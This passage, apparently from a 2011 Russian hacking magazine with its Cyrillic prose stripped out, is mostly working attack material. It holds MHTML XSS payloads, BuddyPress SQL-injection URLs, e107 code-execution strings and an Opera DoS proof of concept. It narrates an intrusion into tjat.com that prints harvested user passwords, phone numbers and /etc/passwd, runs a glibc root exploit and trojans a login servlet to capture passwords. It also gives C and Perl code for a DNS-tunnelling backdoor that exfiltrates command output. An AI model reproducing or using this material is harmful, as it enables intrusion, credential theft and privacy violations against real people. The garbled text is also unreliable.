Script src to local files in
the LocalLow directory file://,
JS- Adobe Reader.
MHTML,
. , http://goo.
gl/pCY3P ( win2k3+ie8+Adobe Reader 9).
5. XSS- MHTML + file:///uncpath + MS
Word.
: 80vul.com/mhtml/
word.doc. , c:\word.doc, c:\boot.ini.
Microsoft Word javascript execution
(http://goo.gl/9OKNw). PoC,
word.doc, .
a. html- XSS:
MHTML.
, firebug9 (http://goo.gl/
ERFoS):
<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-11111111
1111 CODEBASE=c:/winnt/system32/calc.exe></OBJECT>
ie6/ie7/ie8 + win2k/winxp/win2k3.
MHTML , , xss- mhtml :
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b760080c744f389><param name=url value=mhtml:file://c:/
word.doc!cookie></OBJECT>
aaaaa
b. MS Word c:\word.xml.
c. c:\word.xml
mhtml- <w:t>aaaaa</w:t>:
/*
Content-Type: multipart/related; boundary="_boundary_by_
mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb2
0vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere-*/
d. c:\word.xml c:\word.doc.
e. c:\word.doc .
, word.
6. Cross Zone Scripting
X 04 /147/ 2011
/*
Content-Type: multipart/related; boundary="_boundary_
by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS
0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5
c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere-*/
calc.exe.
advisory
http://goo.gl/aZ9Ay.
TARGETS
Microsoft Windows XP/2003/Vista/2008/7
SOLUTION
mhtml-.
:
1. Fix it,
support.microsoft.com/kb/2501696.
043
SQL- BuddyPress
2.
Windows ( : securitylab.ru/vulnerability/404604.php).
02
BRIEF
BuddyPress
WordPress,
.
, Google 716 000
BuddyPress inurl:members/admin/activity. SQL-
, (
BuddyPress 1.2.7).
, php-.
1. ./wp-content/plugins/buddypress/
bp-themes/bp-default/groups/single/home.php:
<?php elseif ( bp_group_is_visible() &&
bp_is_active( 'activity' ) ) : ?>
<?php locate_template(
array( 'groups/single/activity.php' ), true ) ?>
2. activity ./wp-content/
plugins/buddypress/bp-themes/bp-default/groups/single/activity.php:
<div class="activity single-group">
<?php locate_template(
array( 'activity/activity-loop.php' ), true ) ?>
</div><!-.activity -->
044
BuddyPress
3. ./wp-content/plugins/buddypress/bp-themes/
bp-default/activity/activity-loop.php : <?php if (
bp_has_activities( bp_ajax_querystring( 'activity' ) ) ) : ?>;
4. ./wp-content/plugins/buddypress/
bp-activity/bp-activity-templatetags.php:
function bp_has_activities( $args = '' ) {
....
$r = wp_parse_args( $args, $defaults );
extract( $r );
....
case 'favorites':
$favs = bp_activity_get_user_favorites( $user_id );
if ( empty( $favs ) )
return false;
$include = implode( ',', (array)$favs );
break;
$activities_template = new BP_Activity_Template ( $page,
X 04 /147/ 2011
$per_page, $max, $include, $sort, $filter,
$search_terms, $display_comments, $show_hidden );
...
5. ./wp-content/plugins/buddypress/bp-activity/
bp-activity-templatetags.php bp_activity_template():
function bp_activity_template( $page, $per_page,
$max, $include, $sort, $filter, $search_terms,
$display_comments, $show_hidden )
{
...
/* Get an array of the logged in users favorite activities */
$this->my_favs = maybe_unserialize(
get_usermeta( $bp->loggedin_user->id,
'bp_favorite_activities' ) );
if ( !empty( $include ) ) {
/* Fetch specific activity items based on IDs */
$this->activities = bp_activity_get_specific( array(
'activity_ids' => explode( ',', $include ),
'max' => $max,
'page' => $this->pag_page,
'per_page' => $this->pag_num,
'sort' => $sort,
'display_comments' => $display_comments ) );
...
}
6. ./wp-content/plugins/buddypress/bp-activity.
php bp_activity_get_specific():
function bp_activity_get_specific( $args = '' ) {
...
$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );
return apply_filters( 'bp_activity_get_specific',
BP_Activity_Activity::get_specific(
$activity_ids, $max, $page, $per_page,
$sort, $display_comments ) );
}
7. , , get_specific() ./
wp-content/plugins/buddypress/bp-activity/bp-activity-classes.php:
function get_specific( $activity_ids, $max = false,
$page = 1, $per_page = 25, $sort = 'DESC',
$display_comments = false )
X 04 /147/ 2011
{
global $wpdb, $bp;
if ( is_array( $activity_ids ) )
$activity_ids = implode( ',', $activity_ids );
$activity_ids = $wpdb->escape( $activity_ids );
...
$activities = $wpdb->get_results( $wpdb->prepare (
"SELECT * FROM {$bp->activity->table_name} WHERE id IN
({$activity_ids}) ORDER BY date_recorded {$sort} $pag_sql"
));
...
}
, $activity_ids escape(),
! sql-
id IN ({$activity_ids})
, sql-injection.
EXPLOIT
:
1. .
2. .
3. sql-.
http://lamer/wp30/groups/test/activity/-9)union(sele
ct(1),(2),(3),(4),(5),concat(user_login,0x3a,user_
pass),(7),(8),(9),(10),(11),(12),(13)from(wp_users)
where(id=1)
, blind- :
http://lamer/wp30/activity/favorite/-9)or(1=(select(1)
from(wp_users)where(user_login=char(97,100,109,105,1
10)))
http://goo.
gl/pdk8r.
TARGETS
BuddyPress >=1.2 <= 1.2.7
045
e107
SOLUTION
./wp-content/plugins/
buddypress/bp-activity/bp-activity-classes.php :
if ( is_array( $activity_ids ) )
$activity_ids = implode( ',', $activity_ids );
$activity_ids = $wpdb->escape( $activity_ids );
:
$activity_ids = $wpdb->escape($activity_ids);
if ( is_array( $activity_ids ) )
$activity_ids = implode( "','", $activity_ids);
id IN ({$activity_ids}) id IN ('{$activity_ids}').
03
OPERA
BRIEF
.
, .
1.
html- select
( PoC DoS ).
046
2. opera:.
.
3. , http . web-
.
4. ,
,
- (
).
5. , Clear all email account
passwords Delete Private Data, email .
.
EXPLOIT
2-4
, .
- DoS- ( , , ).
PoC PHP:
<select name="dos">
<?for($i=0;$i<32768;$i++):?>
<option><?=$i?></option>
<?endfor;?>
</select>
X 04 /147/ 2011
. PoC Perl
:
i=0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA</option>\n"
while i<0x4141
buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA</option>\n"
i+=1
end
HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"
HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
Opera html-.
TARGETS
Opera 10.63, 11.0 .
SOLUTION
opera.com.
, . login.php:
$text = preg_replace("/\{(.*?)\}/e", 'varset($\1,"\1")',
$LOGIN_TABLE);
preg_replace() e
URL http://www.example.com/e107/login.pHp/
{x,phpinfo()}. ,
,
e107 0.7.24:
X 04 /147/ 2011
1. ./search.php 400 :
$text = preg_replace("/\{(.*?)\}/e", '$\1',
$SEARCH_TOP_TABLE);
2. $SEARCH_TOP_TABLE
./e107_themes/templates/search_template.php:
if (!isset($SEARCH_TOP_TABLE)) {
$SEARCH_TOP_TABLE =
"<div style='text-align:center'>
<form id='searchform' name='searchform' method='get'
action='".e_SELF."'>
<table style='".USER_WIDTH."' class='fborder'><tr>
<td class='forumheader3' style='width: 40%'>".LAN_199."
</td>
<td class='forumheader3'
style='width: 60%; white-space: nowrap'>
{SEARCH_MAIN_SEARCHFIELD}
{SEARCH_MAIN_SUBMIT} {ENHANCED_ICON}
</td>
</tr>";
}
e_SELF $_SERVER[PHP_
SELF], ./class2.php:
if(($pos = strpos($_SERVER['PHP_SELF'], ".php/")) !== false)
// redirect bad URLs to the correct one.
{
$new_url = substr($_SERVER['PHP_SELF'], 0, $pos+4);
$new_loc = ($_SERVER['QUERY_STRING']) ?
$new_url."?".$_SERVER['QUERY_STRING'] : $new_url;
header("Location: ".$new_loc);
exit();
}
$_SERVER['PHP_SELF'] = (
($pos = strpos($_SERVER['PHP_SELF'], ".php")) !== false
? substr($_SERVER['PHP_SELF'], 0, $pos+4)
: $_SERVER['PHP_SELF']);
EXPLOIT
0x6a616d6573 , , ,
( ): http://lamer/e107-0.7.24/search.pHp/
{a=eval(phpinfo())}.
TARGETS
e107 <= 0.7.24
SOLUTION
./class2.php :
:
define("e_SELF ", ($pref['ssl_enabled'] == '1' ?
"https://".$_SERVER['HTTP_HOST'] :
"http://".$_SERVER['HTTP_HOST']) .
($_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] :
$_SERVER['SCRIPT_FILENAME']));
:
$_SERVER['PHP_SELF'] = str_replace(array('{', '}',
'%7B', '%7b', '%7D', '%7d'), '', $_SERVER['PHP_SELF']));
047
& M4g (icq 884888, snipper.ru)
TJAT.OM:
ICQ-
, tjat.com,
ICQ/GTalk/Facebook//... . .
,
WAP-.
-
tjat.com. ,
forums.tjat.
com/phpBB2/language/lang_ukrainian/1.php!
, .
-, :
System: Linux tjat-srv-main 2.6.15-1.2054_FC5smp #1 SMP
Tue Mar 14 16:05:46 EST 2006 i686
048
-, -, raptor_
prctl1, Linux Kernel 2.6.13 <=
2.6.17.4 prctl() Local Root Exploit.
-, , - ICQ-, - /usr/local/
apache_1.3.37/logs/. ,
.
,
Reverse IP Lookup,
yougetsignal.com/tools/web-sites-on-web-server, ,
forums.tjat.com :
X 04 /147/ 2011
WARNING
warning
.
.
,
,
.
forums.tjat.com
forums.tjat.com;
temp.tjat.com;
tjat.com ( miami.tjat.com);
www.tjat.com.
, , ,
tjat.com :).
:
/usr/local/hyperic/server-4.2.0/hqdb/bin/
psql -h 10.0.0.1 -l -U postgres -W
(,
, postgres !):
List of databases
Name | Owner
| Encoding
------------------------------------------art
| postgres
| LATIN1
cabs
| postgres
| UTF8
chikka
| postgres
| SQL_ASCII
facebook
| postgres
| UTF8
msn
| postgres
| SQL_ASCII
X 04 /147/ 2011
myid
postgres
space
statistics
summary
template0
template1
tjat
twitter
ucl
wapaol
wapfb
wapicq
wapqq
xmpp
yahoo
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UTF8
LATIN1
SQL_ASCII
SQL_ASCII
SQL_ASCII
LATIN1
LATIN1
SQL_ASCII
UTF8
UTF8
SQL_ASCII
UTF8
SQL_ASCII
SQL_ASCII
UTF8
SQL_ASCII
:
1. wapicq.icquser,
141 (
):
...
555628075 2010-11-07 20:05:39 12.150.188.194
SonyEricssonK610i
333786737 2011-01-29 16:57:25 212.150.188.194
SonyEricssonW595/R3EJ
390588423 2010-12-10 05:08:38 213.87.76.177
Mozilla/5.0 (Linux; U; Android 2.1-update1;
tr-tr; HTC_Wildfire_A3333 Build/ERE27)
429828391 2010-09-05 20:34:00 213.87.86.70
Opera/9.80
...
HTTP://WWW
www
Linux Kernel 2.6.13
<= 2.6.17.4 prctl() Local
Root Exploit: exploitdb.com/exploits/2031;
Glibc advisory: opennet.ru/opennews/art.
shtml?num=28338;
3
Glibc: https://rdot.org/
forum/showthread.
php?t=817;
Java: javadb.
com/write-to-fileusing-bufferedwriter.
2. statistics.traffic,
(- ,
_GET,
);
3. myid.user_accounts myid.users,
:
448280389;junam30
467470765;yulian2007
tjattest10@hotmail.com;tjattest1
049
dima
ytest7654;123456
008138969;yulian7654
tjatqa1;qa1234
...
pg_dump,
PHP, ,
PostgreSQL:
/usr/local/hyperic/server-4.2.0/hqdb/bin/pg_dump
-h 10.0.0.1 -U postgres -i -W -t icquser -v -f /usr/
local/apache_1.3.37/htdocs/forum/phpBB2/language/
lang_ukrainian/1.sql statistics
icquser
statistics /usr/local/apache_1.3.37/htdocs/forum/phpBB2/
language/lang_ukrainian/1.sql
4. postgres-
tjat: 192.168.25.2, 192.168.25.22, 192.168.25.23,
192.168.25.24, 192.168.25.25, 192.168.25.26
nmap-,
.
postgres-,
wap.tjat.com.
PostgreSQL .
, :
1. :
/usr/local/hyperic/server-4.2.0/hqdb/bin/psql -h \
10.0.0.1 -U postgres -d statistics
2. :
set client_encoding to UTF8;
CREATE TABLE aaaaa(b text);
copy aaaaa from '/etc/passwd';
select * from aaaaa;
DROP TABLE aaaaa;
/etc/passwd 10.0.0.1:
...
haim:x:504:507::/home/haim:/bin/tcsh
Tjat_qa_Automation:x:505:508::/home/Tjat_
050
Tomcat
qa_Automation:/bin/bash
TjToFc:x:0:0::/home/TjToFc:/bin/tcsh
vlad:x:506:510::/home/vlad:/bin/tcsh
yulian:x:507:511::/home/yulian:/bin/tcsh
yaron:x:508:512::/home/yaron:/bin/tcsh
yuriy:x:509:513::/home/yuriy:/bin/tcsh
JonathaN:x:510:514::/home/JonathaN:/bin/tcsh
OrenC:x:511:515::/home/OrenC:/bin/tcsh
, , postgres- tjat,
-, /etc/passwd, . ,
copy aaaaa from '/etc/hosts'; :
ERROR: extra data after last expected column
CONTEXT: COPY aaaaa, line 3: "#127.0.0.1 tjat-operdb tjat-stat-db localhost.localdomain localhost
serverDB_il.tjat.com"
, ,
( ),
:).
,
!
, tjat,
X 04 /147/ 2011
ssh
nmap
. , ... , tjat.com
, - : ShadOS
- 103- (xakep.ru/magazine/
xa/103/076/1.asp), ssh.
:
1. tjatcompassword.
2. / .
3. .
, ssh forums.tjat.com
4430, nmap:
Host 192.168.25.8 appears to be up ... good.
Interesting ports on 192.168.25.8:
(The 65530 ports scanned but not shown below are in state:
closed)
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
81/tcp open http Apache httpd 1.3.41 ((Unix))
111/tcp open rpcbind 2 (rpc #100000)
4430/tcp open ssh OpenSSH 4.3 (protocol 2.0)
8009/tcp open ajp13?
, , :
Host mail.tjat.com (82.80.244.153) is up (0.22s latency).
Interesting ports on mail.tjat.com (82.80.244.153):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 1.3.37 ((Unix) PHP/4.4.6)
4430/tcp open ssh OpenSSH 4.3 (protocol 2.0)
, ssh , .
last -50 ,
dima .
, -
, , .
MySQL: /etc/init.d/mysql stop.
dima;dima76767676,
:).
X 04 /147/ 2011
.
ssh -p 4430
dima@192.168.25.2 ,
tjat!
, nmap , 192.168.25.5,
192.168.25.6, 192.168.25.7 192.168.25.8 :
1. .
2. /usr/local/tomcat/logs/iq
wap.icq.com ( forums,
).
3. .
Feb
Feb
Feb
Feb
Feb
Feb
Feb
Feb
...
17
17
12
14
15
16
17
17
00:11
00:22
23:59
00:00
00:00
00:00
00:00
02:51
.
..
icq_access_log.2011-02-12.txt
icq_access_log.2011-02-13.txt
icq_access_log.2011-02-14.txt
icq_access_log.2011-02-15.txt
icq_access_log.2011-02-16.txt
icq_access_log.2011-02-17.txt
( )
, exploit-db.com.
, Glibc:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 dima dima 64 Oct 15 09:21 /proc/10836/fd/3
-> /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 dima dima 64 Oct 15 09:21 /proc/10836/fd/3
-> /tmp/exploit/target (deleted)
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 dima dima 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
051
LoginServlet.class
{
BufferedWriter bufferedWriter = null;
try {
bufferedWriter = new BufferedWriter
(new FileWriter(filename));
bufferedWriter.write(str);
if (bufferedWriter != null) {
bufferedWriter.flush();
bufferedWriter.close();
}
} catch (FileNotFoundException ex) {
ex.printStackTrace();
} catch (IOException ex) {
ex.printStackTrace();
}
root tjat.com
, wap.tjat.com, . java- /usr/
local/tomcat/webapps/wapicq/WEB-INF/classes/com/tjat/icq/wap/
servlet/LoginServlet.class,
:
String uin = WebServiceUtils.getRequestParameter(
request, Parameter.username.value());
if (uin == null)
httpSession.getAttribute("uin");
String password = WebServiceUtils.getRequestParameter(
request, Parameter.password.value());
,
, String password.
:
1. input/output import java.io.*;
2. LoginServlet.class
writeToFile:
public void writeToFile(string filename, string str)
052
3. String password -
:
writeToFile("/tmp/logs/logicq" + uin,
uin+";"+password+"\n");
. 6 000 , , ,
9-:
...
267962705;sfam2990
268196940;iddqd
268314965;9813694
268524966;null
268619289;rfgbnjy
2687242;0leKMyQ7
269558047;lifetec
X 04 /147/ 2011
270323224;ilevr13
270405008;univega
271169757;Minka0708
271216896;bambin
271513810;medvediki
2718070;N@DEZHD@
273801640;mahal7
273967932;aned2305
274288079;52355200
274340894;4672108
274512176;twilight
...
596351383;121314
597424414;Qw95mdfF
597439288;212008
597743487;qwerasdf123
597852239;042206tis
598396568;357159
598858992;15031993
598965238;katea60
599046657;lancer2000
599522128;nyrek90
599560833;2836846
599916355;031093
599922284;null
599950031;burenator
600223141;fuck123
600991756;123ac456
601000602;enemenezicjzack
601142649;2402%5E_%5E
602320989;FK31QC7CJc
602533494;7Mo30qLX
...
, ,
n- . -
44446:
...
Work;10776;sarel;;+972 52 4888601 SMS;
Work;11001;Vadim;;+972 52 3698945 SMS;Thu Nov 23 2006
12:32:40
Work;123178848;sasha;;+972 (547) 391010;Tue Dec 19
2006 14:51:36
Work;12721;yonitg;;+972 502340003 SMS;Mon Jun 19
2006 08:44:54
Work;12826;Orit Fredkof;;;
Work;13579;Rami;;;Thu Sep 07 2006 14:58:57
Work;14366;amit;;(972) 524888622;Sun Jul 30
2006 09:17:37
Work;14441;Ron Harari;;+972 52 4888584 SMS;Thu Sep
07 2006 15:00:06
X 04 /147/ 2011
, ,
, :
1. .
2. ssh.
3. ( !).
, , Tjat
, ICQ, MSN, Facebook ,
:). ,
,
( Tjat
), .
, , ,
tjat.com :). z
053
, Digital Security (twitter.com/asintsov)
DNS.
, : ? -, . -
... .
, , .
+ . ,
, ,
. . :
, exe- .
, ,
, . .
Digital Security exe-,
.exe
( ,
054
). pdf .
. ,
. JavaScript, , QuickTime, Acrobat Reader, Flash Player, Java, VLC Player.
( ,
). , , .
.
? reverse tcp shell , , bind tcp shell
. ,
-. reverse tcp
. .
X 04 /147/ 2011
DNS-. ,
, IP-
. ( )
,
, .
. xxxx.abcd.ru
, ,
. xxxx
. , DNS
,
.
IP-,
. ,
:).
:
-.
, /IE , COM- IE XMLHTTP
GET/POST- . ,
, :
-;
-
( );
,
.
DNS
, .
DNS. , ( , ) (
400 800 ), DNS-
. . , NS- ,
IP- ().
DNS- , SOA, A,
AAAA, CNAME NS/DNS-. . 7-8
, IP- DNS,
. ? :
, abcd.ru,
IP- porno.abcd.ru. DNS , ,
, . ,
abcd.ru , DNS-
porno.abcd.ru (A- AAAA- IPv6).
DNS- ,
, IP-,
DNS-.
. , // DNS. ,
X 04 /147/ 2011
;
DNS- ( HTTP);
.
:
;
( 1 3 );
DNS-.
, DNS . ,
, ,
, .
detected!
, , ,
. ( ) .
dnscat , DNS. , -,
, DNS- TXT (
). ,
055
:
dnscat "" UDP-
;
- 1000 ,
;
, ;
- winsock2,
(,
UAC Windows 7).
,
.
, ,
. , ,
,
, . ,
perl, , cpan
Net::DNS. ,
:).
,
.
#!/usr/bin/perl
use Net::DNS::Nameserver;
use strict;
use warnings;
$DOMAIN="abcd.ru"; #
$MYIP="123.123.123.123"; #
$SITEIP="1.2.3.4"; #
#
056
-
sub reply_handler
{
my ($qname, $qclass, $qtype, $peerhost,$query,$conn) = @_;
my ($rcode, @ans, @auth, @add);
# abcd.ru
if ($qtype eq "A" && $qname eq $DOMAIN )
{
my ($ttl, $rdata) = (3600, $SITEIP);
push @ans, Net::DNS::RR->new(
"$qname $ttl $qclass $qtype $rdata");
$rcode = "NOERROR";
...
}
elsif (($qtype eq "A")&& $qname =~ /(.*)\.$DOMAIN/)
{
$rcode = "NOERROR";
my ($ttl, $rdata) = (1, $SITEIP);
X 04 /147/ 2011
dnscat
push @ans, Net::DNS::RR->new(
"$qname $ttl $qclass $qtype $rdata");
print "Received query ($qname)($qtype) from $peerhost to"
.$conn->{"sockhost"}. "\n";
#
my $req=$1; # ~
my $len= length($req);
my $answ="";
#
for(my $i=0; $i<$len; $i+=2)
{
#
my $bh =(ord(substr($req,$i,1))-0x61) << 4;
#
my $bl = ord(substr($req,($i+1),1))-0x61;
my $bt = chr( $bh + $bl); #
$answ.= $bt;
}
#
open (LOG, ">>DATA.log");
print LOG "[$peerhost][$qname][$answ]\n";
close (LOG);
...
}
elsif( $qname eq $DOMAIN )
{
$rcode = "NOERROR";
}
else
{
$rcode = "NXDOMAIN";
}
# 100% ...
return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
, .
, JITSPRAY -, , .
HEX
, 0x61,
ASCII 'a'. , \r\n \x0A\x0D,
:
0x0A >> 4 = 0x0
0x0A&0x0F = 0xA
0x0D >> 4 = 0x0
0x0D&0x0F = 0xD
'a':
0x61 + 0x0 = 0x61 ~ 'a'
0x61 + 0xA = 0x6B ~ 'k'
0x61 + 0x0 = 0x61 ~ 'a'
0x61 + 0xD = 0x6E ~ 'n'
\r\n akan. ,
, 0x61, 4 .
,
:
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
FILE *fpipe;
#
my $ns = Net::DNS::Nameserver->new(
=> 53,
LocalPort
ReplyHandler => \&reply_handler,
=> 0,
Verbose
) || die "couldn't create nameserver object\n";
# --!
//
//
//
char *command =
"cmd /c echo %username% & ipconfig & net user";
char *domain = ".abcd.ru."; //
char line[1556]; //
char subdns[150] = "nslookup ";
//
$ns->main_loop;
X 04 /147/ 2011
057
Metasploit
ShowWindow( hWnd, SW_HIDE ); //
else
{
subdns[z]=
}
fpipe = (FILE*)_popen(command,"r");
//
int sz=fread(line, 1,1555, fpipe); //
//
subdns[z+1]= 0x61 + lb;
line[sz]=0;
_pclose(fpipe); //4
short i=0;
short next=1;
//
for(int y=0;y<9;y++)
{
subdns[z+y]=domain[y];
}
// 28
// 55 DNS-
do {
short c = 0;
short z = 11;
subdns[z+y]=0;
// "nslookup xxxxxxxxxxx.xxxxx.abcd.ru"
//
//
fpipe = (FILE*)_popen(subdns,"r"); //1
_pclose(fpipe); //4
subdns[9] = 0x61+(next>>4);
subdns[10] = 0x61+(next&0x0F);
for(;i<1555,c<28;i++,z+=2,c++)
{
//
if(line[i]==0x00)
{
subdns[z]=0;next=-1;break;
}
char hb=line[i]>>4;
char lb=line[i]&0x0F;
// DOS-
if(hb<0x0)
{
subdns[z]= 0x61 +(hb&0x0F);
}
058
0x61 + hb;
next++;
} while(next);
return 0;
}
JAVA- PDF.
,
, JAVA
. Adobe Acrobat Reader < 9.3.3, pdf-. PDF
Foxit/Acrobat Reader,
,
X 04 /147/ 2011
, :)
. ,
Acrobat Reader < 9.3.3 ,
.
- , ,
PDF, VBS- ( - cmd \c
echo code > script & echo code >> script),
. , , pdf-,
.
PDF , windows/fileformat/adobe_pdf_embedded_exe_nojs.
, ,
. java-
, PDF' .
,
, , -,
. , , ,
, + java.
, pdf- Avast.
, PDF.
, ,
. ,
, .
VBS- PDF, , , . CMD,
'^' ASCII-:
cmd.exe , , WScript.Shell
WSc^ri^pt.S^hell. , :
WScript.Shell WScri&pt.Sh&ell.
.
, ,
, JAVA + PDF
X 04 /147/ 2011
50%. ,
, ,
. , ,
. , DNS-
.
, , ,
,
, DLP- (, DNS?)
.
.
. , , . -,
, 0? -,
, ,
PDF , , (
Acrobat Reader'). -
( ). ,
, , , . - Windows 7 , UAC . (
). ,
, ,
( , _popen).
- EXE/VBS JAVA,
LoadLibrary, msvctl.dll. -
, - ,
. ,
DNS-payload',
, ,
dsecrg.com :). z
059
(alumni.samara@gmail.com)
Cisco
Cisco Systems
.
,
level 15,
. , Cisco IOS , ,
IOS, Remote Buffer Overflow...
--,
Cisco IOS. IOS. ,
, ,
Cisco IOS. , ,
, , , . , SNMP, Telnet, SSH, HTTP HTTPS.
. Finger, ,
060
SIP H.323,
.
, , SNMP. ,
SNMP . ,
SNMP . Simple Network Management
Protocol
. ,
,
SNMP-
, , SNMP
.
, SNMP
, SNMP
X 04 /147/ 2011
. 2
.
Cisco IOS SNMP , .
Telnet
SNMP. SNMP
nmap. -,
,
. nmap
SNMP SNMP-sysdescr.
nse snmp-brute.nse.
, ip_with_snmp.txt.
, , DVD. ,
? , ,
IP-, bgp.he.net Prefixes v4 my_telecom.txt.
nmap :
, ?
Metasploit. , :
Metasploit Framework,
Metasploit Pro.
Cisco IOS HTTP.
, ,
. CVE-20000945 Interface
Manager Cisco IOS .
Cisco IOS -.
CVE-02001-0537 , , 15
HTTP.
-.
Metasploit Framework
:
1. /auxiliary/scanner/http/cisco_device_manager
2. /auxiliary/scanner/http/cisco_ios_auth_bypass
061
: 3
msf > msfrpcd S U msf P 123
062
, , Telnet
SSH. Cisco IOS
( , ).
,
SSH ,
Telnet . Metasploit Framework
,
. Metasploit Express
Metasploit Pro
Telnet- SSH-,
, .
.
,
. , ,
.
,
Telnet- SSH- Cisco IOS,
, Metasploit
Express Metasploit Pro,
IOS ,
enable .
X 04 /147/ 2011
: 4
enable , , .
, , .
Metasploit
. ,
. , .
Cisco IOS ,
?
, VTY-, enable, VPN, SSL-
Wi-Fi. Metasploit
,
.
Metasploit Express Metasploit Pro , ,
.
Cisco SNMP, , VTY- ciscorules!,
knownonly ,
. ,
,
. X 04 /147/ 2011
, Cisco,
.
Cisco
Motorola
Phenoelit
-
Cisco 1600 Motorola 68360 QUICC ( Blackhat
2002 ).
IOS Cisco
IOS.
, .
Motorola, .
Cisco ( phenoelit.de). ,
Cisco,
- Metasploit Framework
.
z
063
WELCOME
TO BLACKHAT!
security-event,
10 000 .
BlackHat.
, -,
, , , - BlackHat.
, , , .
,
- . BlackHat,
,
, ,
, - .
-
-, Response
Team Oracle, ,
. , ,
, ,
. )
. -
064
.
, . ,
. BlackHat
. , ($3500 ),
,
, . , ,
( ),
. , , ,
- , Mac Hacking Class
RFID, Access Control & Biometric Systems.
Pentesting With backtrack
X 04 /147/ 2011
GPRS EDGE
Attack Research, , ,
BlackHat. Tactical
Exploitation , . ,
,
( ,
).
,
. -
: ,
, .
, .
: ,
, ( ).
, , , . , BlackHat Las-Vegs
-, . ,
. , :
Cyber-attacks to SAP platforms: The Insider Threat
;
Peach Fuzzing ;
Hardware Reverse Engineering: Access, Analyze and
Defeat;
How to Hack Large Companies and Make Millions;
The Mac Exploit Kitchen
.
, , , , ,
. ,
,
.
, , Rapid7, Nessus, IOActive,
CoreSecurity . , ,
Metasploit Nessus (,
, XL ). HBGarry,
, . ,
,
Forensics-. ,
.
. ,
BlackHat,
.
X 04 /147/ 2011
GPU CPU
,
, .
: , - : ? ?.
, :
, , , .
, , , .
, ,
. ,
! .
. ,
,
. ,
, ,
WPA2, . . ,
, WPA,
... , , -
, . , ,
WPA2. ,
, Amazon.
Core i7 ,
GeForce 295 GTX.
GPU- Amazon:
22GB RAM
2 x Intel Xeon X5570
2 x NVIDIA Tesla Fermi M2050
$2.10/
$16 , GPU-,
400 000 PMK ( WPA) , , PC. ,
,
, - . -,
, !
: Stale
pointers are the new black ( ,
dangling pointers, double frees uninitialized memory),
Kernel Pool Exploitation on Windows 7 (
). , .
065
, ,
.
. , ,
. , , -,
.
, , ,
Linux - , ,
Mac OS, Android, BlackBerry .
, , , .
, , . Popping Shell on
A(ndroid)RM Devices
-
ARM- (, ). , Webkit (
, Google Chrome) $35000-39000,
, -
. SMS GSM-
. , :
, . , RET2LIBC ARM- ,
, (
, ),
0-day webkit, Motorola
Droid. - . , ,
, . ,
cancel .
. , , ,
. ,
URL-, !
The Apple Sandbox.
, Jit-Spray,
.
. ,
, ,
, Apple Sandbox (XNU Sandbox) ,
. Apple, ,
.
066
-
, .
, , .
,
! +500
.
practical attack against GPRS/EDGE/UMTS/HSPA mobile data
communications. , -
. , ,
, , GSM- (Practical Cellphone Spying. Chris Paget. DEF CON 18 July
2010). , ,
(OpenBTS)
,
.
, GPRS- EDGE- ip.access
nanoBTS IP-.
,
, Cellphone Jammer (-
UMTS/HSPA). ,
, ,
.
.
BTS-
. ,
, , . ,
, .
, iPhone/iPad -.
,
SMS, .
, UMTS ,
,
UMTS-,
GSM, .
, -
. The Baseband
Apocalypse .
GSM-, GSM-,
.
,
Wi-Fi , .
X 04 /147/ 2011
Symantec,
#1
-
. , ,
, . ,
ASLR, NX- ( Infineon XMM6180,
IPhone 4). ,
Qualcomm Infineon,
iPhone HTC Dream.
, , ,
.
,
,
. ,
:).
,
(, ,
).
(, ),
.
.
Layer7 DOS? .
, HTTP(S), SMTP,
FTP.
. 2009
POST-, .
, ,
.
? Content-Length HTTP- , . , Content-Length = 1000.
, , = 1000,
1 , ,
.
- ! , 20 000 IP-,
, .
owasp.org/index.php/OWASP_
HTTP_Post_Tool. DDOS
( ,
). ,
, .
.
X 04 /147/ 2011
Symantec,
#2
BlackHat XSS.
Trustwave. Trustwave
Spider Labs.
, , , . ,
, .
, . ,
Hacking the Fast Lane:
security issues with 802.11p, DSRC and wave
.
, , : . -,
Trustwave XSS: Street Fight
XSS-
, Mod Security (
).
Our favorite XSS filters and how to bypass them ,
, ,
Mod Security.
.
. -
Enterprise,
. - :
(MS Office );
(CRM, -, , );
